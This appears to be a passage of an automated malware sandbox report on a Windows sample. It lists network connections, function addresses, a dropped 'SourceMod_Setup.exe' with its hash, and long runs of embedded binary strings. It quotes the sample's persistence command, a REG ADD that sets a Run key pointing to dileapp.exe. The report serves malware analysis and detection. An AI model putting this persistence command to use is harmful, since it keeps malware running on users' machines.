Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00877070: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00877070
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008859840_2_00885984
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008784090_2_00878409
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0089E8D40_2_0089E8D4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008830E60_2_008830E6
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087E0450_2_0087E045
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087D1D20_2_0087D1D2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088E94A0_2_0088E94A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088FAC80_2_0088FAC8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008732030_2_00873203
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087BA1A0_2_0087BA1A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088F25E0_2_0088F25E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087DBE20_2_0087DBE2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008863F20_2_008863F2
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00882B3A0_2_00882B3A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0089A35E0_2_0089A35E
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00892B780_2_00892B78
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087EC970_2_0087EC97
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00885DB90_2_00885DB9
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00882DB50_2_00882DB5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087D5E40_2_0087D5E4
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00875E960_2_00875E96
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088F6930_2_0088F693
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00899EB00_2_00899EB0
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0088EE460_2_0088EE46
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00884FB50_2_00884FB5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00873FC50_2_00873FC5
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0087276C0_2_0087276C
Source: Joe Sandbox ViewDropped File: C:\Users\Public\Netstat\dileapp\SourceMod_Setup.exe 7B029D45FDAB9E8FEEE93E443B9B179C6D4010810BA2DDE3F2611BF24A7F09A4
Source: C:\Users\user\Desktop\file.exeCode function: String function: 0088CEC0 appears 53 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 0088D870 appears 31 times
Source: C:\Users\user\Desktop\file.exeCode function: String function: 0088CDF0 appears 37 times
Source: file.exe, 00000000.00000003.1678988930.0000000006821000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs file.exe
Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\dileapp.exe"
Source: SourceMod_Setup.exe.0.drBinary string: Nyiakeng_Puachue_HmongOccitan France (oc-FR)OleCreatePropertyFrameOperatingModeRequestedOromo Ethiopia (om-ET)Pakistan Standard TimeParaguay Standard TimeParty mode temperaturePayee.PostalCode emptyPower PC little endianRat.Scan: invalid verbRegisterTypeLibForUserRegistry cannot be nilRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersRunesToString panickedRussian Russia (ru-RU)SafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSanskrit India (sa-IN)Sao Tome Standard TimeSec-WebSocket-ProtocolSec-Websocket-ProtocolSesotho Sa Leboa (nso)SetupDiEnumDriverInfoWSetupDiGetClassDevsExWSomali Somalia (so-SO)Spanish Mexico (es-MX)Spanish Panama (es-PA)Svalbard and Jan MayenSwedish Sweden (sv-SE)Tasmania Standard TimeTrainingCenterDatabaseTurkish Turkey (tr-TR)UnmarshalerDecodeValueUnsupported Media TypeW2 forms not availableWSAAsyncGetProtoByNameWSAGetOverlappedResultWSALookupServiceBeginAWSALookupServiceBeginWWSCWriteNameSpaceOrderWaitForMultipleObjectsWriteBinaryWithSubtypeWrong unwind opcode %dYCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444Yiddish World (yi-001)Yoruba Nigeria (yo-NG)\Device\NamedPipe\msys^(0[xX])?[0-9a-fA-F]+$^(\d{4}([ ]?\d{4})?)?$^data:.+\/(.+);base64$active_sql_transactionaddress already in useadvapi32.dll not foundapplication/javascriptapplication/postscriptapplication/x-coredumpapplication/x-font-ttfapplication/x-msaccessargument list too longarray index not numberassembly checks failedattempt to set nil errbad g->status in readybad sweepgen in refillbody closed by handlerbsoncore.Value.AsInt32bsoncore.Value.AsInt64bsoncore.Value.Booleancannot allocate memorycannot decode into nilcannot unmarshal into compileCallabck: type driver: bad connectionduplicated defer entryelement is missing keyerror closing zlib, %serror decoding messageerror parsing regexp: excessive DC componentexpected /> in elementexpected end; found %sexpected quoted stringframe_data_pad_too_bigfreeIndex is not validgb18030_unicode_520_cigetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhttp2: frame too largeidna: invalid label %qillegal TIME length %dimage/vnd.mozilla.apnginappropriate fallbackindeterminate_datatypeindex out of range: %dinsufficient_privilegeinsufficient_resourcesinteger divide by zerointerface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid debtClass (%d)invalid imageType (%d)invalid message lengthinvalid number base %dinvalid optAction (%d)invalid stockType (%d)invalid svcStatus (%d)invalid time bytes: %sjson: unknown field %qkernel32.dll not foundlanguage-not-supportedmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressnetwork is unreachablenon-Go function at pc=non-positive dimensionnull_value_not_allowedoldoverflow is not niloperation was canceledoverflowing coordinatepanic: undefined errorparenthe
Source: SourceMod_Setup.exe.0.drBinary string: ricaines (les)Sec-WebSocket-ExtensionsSec-Websocket-ExtensionsSetConsoleCursorPositionSetDefaultDllDirectoriesSetupDiCreateDeviceInfoWSetupDiGetSelectedDeviceSetupDiSetSelectedDeviceSource account not foundSpanish Colombia (es-CO)Spanish Honduras (es-HN)Spanish Paraguay (es-PY)Statut pompe circulationTigrinya Eritrea (ti-ER)US Eastern Standard TimeUnRegisterTypeLibForUserUnrecognized parameter: VariantTimeToDosDateTimeVirgin Islands (British)WSAAsyncGetProtoByNumberWSAWaitForMultipleEventsWindows boot applicationWire beneficiary invalid\Device\NamedPipe\cygwin^((1[0-2]|[2-9])\d{2})?$^9695[012]([ \-]\d{4})?$^969[67]\d([ \-]\d{4})?$^length\((\d+)\|(\d+)\)$_html_template_urlfilteraddress string too shortapplication/mspowerpointapplication/octet-streamapplication/vnd.ms-excelapplication/x-bittorrentapplication/x-executableapplication/x-javascriptarray index out of rangebad defer entry in panicbase58: invalid argumentbsoncore.Value.DBPointerbsoncore.Value.Timestampbypassed recovery failedcan't scan our own stackcertificate unobtainablechacha20: wrong key sizeconnecting to gateway %sconnection reset by peerdouble traceGCSweepStartduplicate %TAG directiveerror decrypting messageexceeded max depth of %dexec: Stdout already setfdw_invalid_option_indexfield %v is not settableflate: maxBits too largefloating point exceptionfloating_point_exceptionframe_headers_prio_shortfunction not implementedgcDrainN phase incorrectguild_scheduled_event_idhash of unhashable type http2: canceling requesthttp: nil Request.Headeridna: disallowed rune %Uimage/x-portable-graymapinitSpan: unaligned baseinvalid argument to Intninvalid interlace methodinvalid loanPmtFreq (%d)invalid optSellType (%d)invalid pseudo-header %qinvalid request :path %qinvalid restriction (%d)invalid subAcctType (%d)invalid_column_referenceinvalid_escape_characterinvalid_table_definitionjson: unsupported type: level 2 not synchronizedlink number out of rangemail: double dot in atommissing likely tags datanot supported by windowsorigin-when-cross-originout of streams resourcespageAlloc: out of memoryqueuefinalizer during GCrange partially overlapsread handler must be setread_frame_conn_error_%sreflect.MapIter.SetValuereflect.Value.SetComplexreflect.Value.UnsafeAddrresource length too longrunqsteal: runq overflowruntime: VirtualFree of runtime: found obj at *(runtime: markroot index runtime: p.searchAddr = sending heartbeat packetsetting %v not supportedspan has no free objectssql: statement is closedstack trace unavailable
Source: SourceMod_Setup.exe.0.drBinary string: lande (la)NtProtectVirtualMemoryNtSetSystemInformationNtWaitForSingleObjectNyiakeng_Puachue_HmongOccitan France (oc-FR)OleCreatePropertyFrameOperatingModeRequestedOromo Ethiopia (om-ET)Pakistan Standard TimeParaguay Standard TimeParty mode temperaturePayee.PostalCode emptyPower PC little endianRat.Scan: invalid verbRegisterTypeLibForUserRegistry cannot be nilRoGetActivationFactoryRtlDeleteFunctionTableRtlGetNtVersionNumbersRunesToString panickedRussian Russia (ru-RU)SafeArrayGetRecordInfoSafeArraySetRecordInfoSakhalin Standard TimeSanskrit India (sa-IN)Sao Tome Standard TimeSec-WebSocket-ProtocolSec-Websocket-ProtocolSesotho Sa Leboa (nso)SetupDiEnumDriverInfoWSetupDiGetClassDevsExWSomali Somalia (so-SO)Spanish Mexico (es-MX)Spanish Panama (es-PA)Svalbard and Jan MayenSwedish Sweden (sv-SE)Tasmania Standard TimeTrainingCenterDatabaseTurkish Turkey (tr-TR)UnmarshalerDecodeValueUnsupported Media TypeW2 forms not availableWSAAsyncGetProtoByNameWSAGetOverlappedResultWSALookupServiceBeginAWSALookupServiceBeginWWSCWriteNameSpaceOrderWaitForMultipleObjectsWriteBinaryWithSubtypeWrong unwind opcode %dYCbCrSubsampleRatio410YCbCrSubsampleRatio411YCbCrSubsampleRatio420YCbCrSubsampleRatio422YCbCrSubsampleRatio440YCbCrSubsampleRatio444Yiddish World (yi-001)Yoruba Nigeria (yo-NG)\Device\NamedPipe\msys^(0[xX])?[0-9a-fA-F]+$^(\d{4}([ ]?\d{4})?)?$^data:.+\/(.+);base64$active_sql_transactionaddress already in useadvapi32.dll not foundapplication/javascriptapplication/postscriptapplication/x-coredumpapplication/x-font-ttfapplication/x-msaccessargument list too longarray index not numberassembly checks failedattempt to set nil errbad g->status in readybad sweepgen in refillbody closed by handlerbsoncore.Value.AsInt32bsoncore.Value.AsInt64bsoncore.Value.Booleancannot allocate memorycannot decode into nilcannot unmarshal into compileCallabck: type driver: bad connectionduplicated defer entryelement is missing keyerror closing zlib, %serror decoding messageerror parsing regexp: excessive DC componentexpected /> in elementexpected end; found %sexpected quoted stringframe_data_pad_too_bigfreeIndex is not validgb18030_unicode_520_cigetenv before env initgzip: invalid checksumheadTailIndex overflowheader field %q = %q%shpack: string too longhttp2: frame too largeidna: invalid label %qillegal TIME length %dimage/vnd.mozilla.apnginappropriate fallbackindeterminate_datatypeindex out of range: %dinsufficient_privilegeinsufficient_resourcesinteger divide by zerointerface conversion: internal inconsistencyinvalid Trailer key %qinvalid address familyinvalid debtClass (%d)invalid imageType (%d)invalid message lengthinvalid number base %dinvalid optAction (%d)invalid stockType (%d)invalid svcStatus (%d)invalid time bytes: %sjson: unknown field %qkernel32.dll not foundlanguage-not-supportedmalformed HTTP versionminpc or maxpc invalidmissing ']' in addressmultiple :: in addressnetwork is unreachablenon-Go function at pc=non-positive dimensionnull_value_not_allowedoldoverflow is not ni
Source: classification engineClassification label: mal68.winEXE@23/5@6/5
